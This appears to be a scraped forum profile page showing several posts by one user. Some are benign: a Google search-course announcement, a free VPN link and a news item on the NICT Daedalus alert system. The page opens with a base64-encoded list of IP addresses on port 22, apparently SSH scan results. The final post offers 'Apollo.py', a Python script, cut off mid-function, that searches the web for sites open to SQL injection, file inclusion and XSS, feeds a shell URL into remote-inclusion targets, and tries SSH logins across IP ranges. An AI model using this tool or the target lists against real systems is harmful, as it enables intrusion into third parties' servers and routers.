I0LjQwLjQxLjE0NiUyMCUyMCUyMDMxNSUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEE3Mi4zMy4xMDEuMTElMjAlMjAlMjAlMjAtOTIlMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1Qm4vYSU1RCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBMTA3LjIxLjE1NS42OSUyMCUyMCUyMC0xMTclMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMGVjMi0xMDctMjEtMTU1LTY5LmNvbXB1dGUtMS5hbWF6b25hd3MuY29tMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEExMTEuNjguMjA1Ljg4JTIwJTIwJTIwMTc2JTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBqaW5rZWkuanAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTIxNi4xODEuMTcuODYlMjAlMjAlMjAtMTI1JTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNUJuL2ElNUQlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTc1LjE3Mi4xODIuMjE0JTIwJTIwLTM2JTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjA3NS0xNzItMTgyLTIxNC5waG54LnF3ZXN0Lm5ldDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBNzQuOTQuMTc0Ljg1JTIwJTIwJTIwJTIwLTkyJTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjA3NC05NC0xNzQtODUtTmV3RW5nbGFuZC5oZmMuY29tY2FzdGJ1c2luZXNzLm5ldDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBNzguMTI5LjIwOC4xNDElMjAlMjA1MSUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEExMjAuMzYuMTAuMTQ5JTIwJTIwJTIwMzc1JTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNUJuL2ElNUQlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTc4LjgzLjE1Ny4xOTMlMjAlMjAlMjA2MyUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEExMDkuMTIzLjExNS4yMTAlMjA0NCUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEE3Mi40Ny4yMzIuMjE3JTIwJTIwJTIwLTQyJTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNUJuL2ElNUQlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTIyMy41LjEzNC4yMjIlMjAlMjAlMjAzNTYlMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1Qm4vYSU1RCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBMjAxLjM5LjQwLjE1MCUyMCUyMCUyMDI4NCUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwbWVnYW5ldC1GMi0wLTUtZ2FjYzAxLmZsYS5lbWJyYXRlbC5uZXQuYnIyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTc2LjEyLjc0LjE0MSUyMCUyMCUyMCUyMC0xMjUlMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1Qm4vYSU1RCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBMTExLjI0MC4xMTUuMTUyJTIwMzU1JTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAxMTEtMjQwLTExNS0xNTIuZHluYW1pYy5oaW5ldC5uZXQyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTIwMC44MC45NC4yMDUlMjAlMjAlMjAtODklMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1Qm4vYSU1RCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBMTA5Ljk1LjUuMTk3JTIwJTIwJTIwJTIwNjUlMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMFBDLTEwOS05NS01LTE5Ny5uZXQtY29tLm5ldC5wbDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBMjE2LjE4Ny43OS44MSUyMCUyMCUyMC01MSUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwcmVtb3RlY29udHJvbGhlbGljb3B0ZXIuY29tMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEE3OS4xODIuMTU1Ljg2JTIwJTIwJTIwMTExJTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBienEtNzktMTgyLTE1NS04Ni5yZWQuYmV6ZXFpbnQubmV0MjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEEyMDcuNTcuMTg4LjIxNiUyMCUyMC0xMjElMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMHdlbGxtYWRldG9vbHMubmV0JTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEExMjQuMTEwLjEzNy4xMzQlMjAzMDUlMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1Qm4vYSU1RCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBNzQuMjEzLjE2LjIwMSUyMCUyMCUyMC0xMDAlMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1Qm4vYSU1RCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBMTA5LjIwNi43NC4xMzAlMjAlMjA1MyUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEExMjQuNjUuMzkuMyUyMCUyMCUyMCUyMCUyMDU4NiUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEE3Ni44Ljc3LjkwJTIwJTIwJTIwJTIwJTIwJTIwLTExNCUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEExMDkuNzMuMTg2Ljk1JTIwJTIwJTIwODclMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1Qm4vYSU1RCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBMTIyLjkwLjUuMTIlMjAlMjAlMjAlMjAlMjAxOTUlMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1Qm4vYSU1RCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBMjE2LjE4MC4yNDYuMTk0JTIwLTExNSUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEExMjAuMTk3LjgxLjIwNSUyMCUyMDI5MSUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEE4OS4xODAuMy4yMTUlMjAlMjAlMjAlMjA5MyUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwODktMTgwLTMtMjE1Lm5ldC5ub3Zpcy5wdDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBMjE3LjE0Ni44NC44NiUyMCUyMCUyMDUxJTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjB3YWxsYmFuZ2VkLnRoYXQubmVyZC5hZHVsa2kub24ub25lcG9pbnRzaXguZXUyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTkxLjIwMS41Ni4yMiUyMCUyMCUyMCUyMDM4JTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBzb2Z0cGx1c3dlYi5zb2Z0LXBsdXMuY2gyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTExMS45My44MC44MiUyMCUyMCUyMCUyMDQ4JTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNUJuL2ElNUQlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTEwOC4xNzkuMjAxLjE0MiUyMC05MyUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwbGlzLmxpc3R3aXNlLW8xLm5ldCUyMCUyMCUyMCUyMCUyMDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBOTUuMTQ5LjE0My4xNTMlMjAlMjA3OCUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEEyMDUuMjEyLjE4OC4xOCUyMCUyMC01MCUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwcmFiYml0LWcuY28uanAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTIyMC42OC4yMzYuMyUyMCUyMCUyMCUyMDM2MCUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEE3NC4xMTkuMTcuMTQ2JTIwJTIwJTIwLTk5JTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNUJuL2ElNUQlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTIwNy4yMjYuMTYyLjcxJTIwJTIwMTIwJTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNUJuL2ElNUQlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTEyMi4yMDEuMTExLjIwMiUyMDM2MCUyMG1zJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTVCbi9hJTVEJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwMjIlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMEE3OS4xODAuMTA1LjEzMiUyMCUyMDI4JTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBienEtNzktMTgwLTEwNS0xMzIucmVkLmJlemVxaW50Lm5ldDIyJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTBBMjAwLjM4LjExLjY1JTIwJTIwJTIwJTIwLTUyJTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNUJuL2ElNUQlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTEwOC4xNjAuMTE0LjEzJTIwJTIwLTcxJTIwbXMlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlNUJuL2ElNUQlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAyMiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQTc1LjE2Ni4xODQuMTUlMjAlMjAlMjAtNTUlMjBtcyUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMDc1LTE2Ni0xODQtMTUuaGxybi5xd2VzdC5uZXQyMg== without Hostname OTMuMTkxLjI0MS4xNDglMEE3Mi40My4yMTQuNjclMEEyMTYuNTcuNjUuMTkzJTBBODguMjM1LjE2MS4xNSUwQTk1LjE4LjE4NS4xNDclMEE5MS4xMjMuMjA0LjkwJTBBOTEuMTIxLjE4NC45MCUwQTIxNi4xMDguMjM2LjE0NiUwQTEwNy42LjY2LjEzMCUwQTIwMS40Ny4yMDcuMiUwQTc0LjIxMy4yNy4yNSUwQTc4LjQ3LjI4Ljc0JTBBNzQuMTE1LjI1My4yMDklMEEyMTkuMTQwLjY4LjYlMEExMjQuNDAuNDEuMTQ2JTBBNzIuMzMuMTAxLjExJTBBMTA3LjIxLjE1NS42OSUwQTExMS42OC4yMDUuODglMEEyMTYuMTgxLjE3Ljg2JTBBNzUuMTcyLjE4Mi4yMTQlMEE3NC45NC4xNzQuODUlMEE3OC4xMjkuMjA4LjE0MSUwQTEyMC4zNi4xMC4xNDklMEE3OC44My4xNTcuMTkzJTBBMTA5LjEyMy4xMTUuMjEwJTBBNzIuNDcuMjMyLjIxNyUwQTIyMy41LjEzNC4yMjIlMEEyMDEuMzkuNDAuMTUwJTBBNzYuMTIuNzQuMTQxJTBBMTExLjI0MC4xMTUuMTUyJTBBMjAwLjgwLjk0LjIwNSUwQTEwOS45NS41LjE5NyUwQTIxNi4xODcuNzkuODElMEE3OS4xODIuMTU1Ljg2JTBBMjA3LjU3LjE4OC4yMTYlMEExMjQuMTEwLjEzNy4xMzQlMEE3NC4yMTMuMTYuMjAxJTBBMTA5LjIwNi43NC4xMzAlMEExMjQuNjUuMzkuMyUwQTc2LjguNzcuOTAlMEExMDkuNzMuMTg2Ljk1JTBBMTIyLjkwLjUuMTIlMEEyMTYuMTgwLjI0Ni4xOTQlMEExMjAuMTk3LjgxLjIwNSUwQTg5LjE4MC4zLjIxNSUwQTIxNy4xNDYuODQuODYlMEE5MS4yMDEuNTYuMjIlMEExMTEuOTMuODAuODIlMEExMDguMTc5LjIwMS4xNDIlMEE5NS4xNDkuMTQzLjE1MyUwQTIwNS4yMTIuMTg4LjE4JTBBMjIwLjY4LjIzNi4zJTBBNzQuMTE5LjE3LjE0NiUwQTIwNy4yMjYuMTYyLjcxJTBBMTIyLjIwMS4xMTEuMjAyJTBBNzkuMTgwLjEwNS4xMzIlMEEyMDAuMzguMTEuNjUlMEExMDguMTYwLjExNC4xMyUwQTc1LjE2Ni4xODQuMTU=
  19. Fi8sVrs
    Want to learn how to find cat videos in Japanese, the location of that photo your friend took or the name of the book you just can’t remember? Now there’s an online course for that. Google is running a free Massive Open Online Course (MOOC), enriched with social and communication tools to help you become a “Google Power Searcher.” The online course will start on July 10 and will be comprised of six 50-minute classes which can be completed within your own time during a two-week window. “The lessons include interactive activities to practice new skills, and many opportunities to connect with others using Google tools such as Google Groups, Moderator and Google+, including Hangouts on Air, where world-renowned search experts will answer your questions on how search works. Googlers will also be on hand during the course period to help and answer your questions in case you get stuck,” said Terry Ednacot, Education Program Manager at Google. The Power Searching with Google course is just one of many free online courses that you can take to enrich your life and expand your skill set. US universities Stanford and MIT have been pioneering the online course format via Coursera and MITx. Other notable online courses can be found on Codecademy, the Khan academy and iTunes U. To sign up for Power Searching with Google visit Power Searching with Google – Inside Search – Google source yahoo
  20. Fi8sVrs
    pune link direct fara adf.ly,tinyurl s.a.m.d.
  21. Fi8sVrs

    Free VPN

    Fi8sVrs posted a topic in Free stuff

    http://packetix.net/en/vpn/
  22. Fi8sVrs
    NICT has developed Daedalus, a cyber-attack alert system. Daedalus renders attacks on networks visible in real time. The sphere in the center represents the Internet, and the circles moving around it represent networks under observation. The state of an attack is shown using 3D graphics, and can be viewed from any perspective. Today's cyber-attacks breach boundary defenses from inside and outside organizations, including the spread of malware via USB memory sticks and mail attachments, as well as zero-day exploits. So, using Daedalus together with conventional boundary systems is expected to improve network security within organizations. The technology for this system will be transferred to clwit, which will include it in a commercial alert service called SiteVisor. NICT also provides the system free of charge to educational institutions where nicter sensors can be installed. source: DigInfo TV
  23. Fi8sVrs
    A scanner written in python, can dork for SQLI, LFI,XSS,RFI vulns and perform other scans. Apollo.py - Python Vulnerability Scanner V1 - Written by Sotd - twitter.com/#!/Sotd_ Usage: python Apollo.py _____ _ _ / ___| | | | | \ `--. ___ | |_ __| | `--. \/ _ \| __|/ _` | /\__/ / (_) | |_ (_| | \____/ \___/ \__|\__,_| ################################################# # | # # \ _ / # # Welcome to Apollo -= (_) =- # #Options: / \ # #[1] Sqli | # #[2] Lfi # #[3] Xss # #[4] Rfi # #[5] Routers # #[6] Admin Page Finder # #[7] Sub Domain Scan # #[8] Dictionary MD5 cracker # #[9] Online MD5 cracker # #[10] Check IP # ################################################# [python]#!/usr/bin/env python """ Apollo.py - Python Vulnerability Scanner V1 - Written by Sotd - twitter.com/#!/Sotd_ """ #For dorks don't include inurl: , Eg: Enter your dork: main.php?id= import re import hashlib import Queue from random import choice import threading import time import urllib2 import sys import socket try: import paramiko #Router option requires the paramiko module for shh connections. PARAMIKO_IMPORTED = True except ImportError: PARAMIKO_IMPORTED = False USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)" ] option = ' ' vuln = 0 invuln = 0 np = 0 found = [] class Router(threading.Thread): """Checks for routers running ssh with given User/Pass""" def __init__(self, queue, user, passw): if not PARAMIKO_IMPORTED: print 'You need paramiko.' print 'http://www.lag.net/paramiko/' sys.exit(1) threading.Thread.__init__(self) self.queue = queue self.user = user self.passw = passw def run(self): """Tries to connect to given Ip on port 22""" ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10) ssh.close() print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw) write = open('Routers.txt', "a+") write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw)) write.close() self.queue.task_done() except: print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw) self.queue.task_done() class Ip: """Handles the Ip range creation""" def __init__(self): self.ip_range = [] self.start_ip = raw_input('Start ip: ') self.end_ip = raw_input('End ip: ') self.user = raw_input('User: ') self.passw = raw_input('Password: ') self.iprange() def iprange(self): """Creates list of Ip's from Start_Ip to End_Ip""" queue = Queue.Queue() start = list(map(int, self.start_ip.split("."))) end = list(map(int, self.end_ip.split("."))) tmp = start self.ip_range.append(self.start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp == 256: tmp = 0 tmp[i-1] += 1 self.ip_range.append(".".join(map(str, tmp))) for add in self.ip_range: queue.put(add) for i in range(10): thread = Router(queue, self.user, self.passw ) thread.setDaemon(True) thread.start() queue.join() class Crawl: """Searches for dorks and grabs results""" def __init__(self): if option == '4': self.shell = str(raw_input('Shell location: ')) self.dork = raw_input('Enter your dork: ') self.queue = Queue.Queue() self.pages = raw_input('How many pages(Max 20): ') self.qdork = urllib2.quote(self.dork) self.page = 1 self.crawler() def crawler(self): """Crawls Ask.com for sites and sends them to appropriate scan""" print '\nScanning Ask...' for i in range(int(self.pages)): host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page) req = urllib2.Request(host) req.add_header('User-Agent', choice(USER_AGENT)) response = urllib2.urlopen(req) source = response.read() start = 0 count = 1 end = len(source) numlinks = source.count('_t" href', start, end) while count < numlinks: start = source.find('_t" href', start, end) end = source.find(' onmousedown="return pk', start, end) link = source[start+10:end-1].replace("amp;","") self.queue.put(link) start = end end = len(source) count = count + 1 self.page += 1 if option == '1': for i in range(10): thread = ScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '2': for i in range(10): thread = LScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '3': for i in range(10): thread = XScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '4': for i in range(10): thread = RScanClass(self.queue, self.shell) thread.setDaemon(True) thread.start() self.queue.join() class ScanClass(threading.Thread): """Scans for Sql errors and ouputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.schar = "'" self.file = 'Sqli.txt' def run(self): """Scans Url for Sql errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np test = site + self.schar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("You have an error in your SQL syntax", data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('mysql_fetch', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database Engine', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Microsoft OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def mysql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "MySql: " + url write = open(self.file, "a+") write.write(' [SQLI]: ' + url + "\n") write.close() def mssql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file).read() if url in read: print 'Dupe: ' + url else: print "MsSql: " + url write = open ('[SQLI]: ' + self.file, "a+") write.write(url + "\n") write.close() class LScanClass(threading.Thread): """Scans for Lfi errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.file = 'Lfi.txt' self.queue = queue self.lchar = '../' def run(self): """Checks Url for File Inclusion errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: lsite = site.rsplit('=', 1)[0] if lsite[-1] != "=": lsite = lsite + "=" test = lsite + self.lchar global vuln global invuln global np try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("failed to open stream: No such file or directory", data, re.I)): self.lfi(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def lfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' 